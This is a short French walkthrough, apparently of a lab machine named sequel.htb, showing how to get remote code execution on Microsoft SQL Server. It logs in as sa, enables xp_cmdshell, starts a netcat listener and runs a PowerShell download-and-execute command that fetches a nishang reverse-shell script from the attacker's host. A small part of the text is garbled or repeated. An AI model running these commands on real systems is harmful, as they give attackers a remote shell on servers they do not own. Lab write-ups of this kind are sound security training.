MSSQL Exploitation - RCE

Exploitation MSSQL (Microsoft SQL)

Port 1433 (MSSQL)

Le port 1433 est ouvert, ce qui indique qu'un serveur Microsoft SQL est en écoute. Nous allons tester les connexions avec les différents utilisateurs récupérés précédemment.

Test de connexion MSSQL

Nous utilisons mssqlclient.py pour tenter de nous connecter :

mssqlclient.py sequel.htb/[email protected]
mssqlclient.py sequel.htb/[email protected]
mssqlclient.py sequel.htb/[email protected]

Résultat : Seul l'utilisateur sa fonctionne.

mssqlclient.py sequel.htb/[email protected]

Reverse Shell via MSSQL

Activation de l'exécution des commandes

Pour exécuter des commandes système, nous activons xp_cmdshell :

enable_xp_cmdshell

Nous testons ensuite avec une commande simple, comme ipconfig :

xp_cmdshell ipconfig

Préparation de l'écoute sur notre machine

Nous lançons un écouteur sur le port 4444 :

rlwrap nc -nvlp 4444

Téléchargement d'un script PowerShell

Nous préparons un script PowerShell nommé PS.ps1 qui inclut une commande de reverse shell. À la fin du script, nous ajoutons la ligne suivante :

https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcp.ps1raw.githubusercontent.com

À la fin du script, nous ajoutons la ligne suivante :

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port 4444

Nous hébergeons ce script sur un serveur web local :

python3 -m http.server 80

Exécution du reverse shell

Depuis le serveur MSSQL, nous exécutons la commande suivante pour télécharger et exécuter le script PowerShell :

xp_cmdshell powershell -NoP -NonI -Command "iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.30/PS.ps1'')"

Mis à jour il y a 10 mois

Ce contenu vous a-t-il été utile ?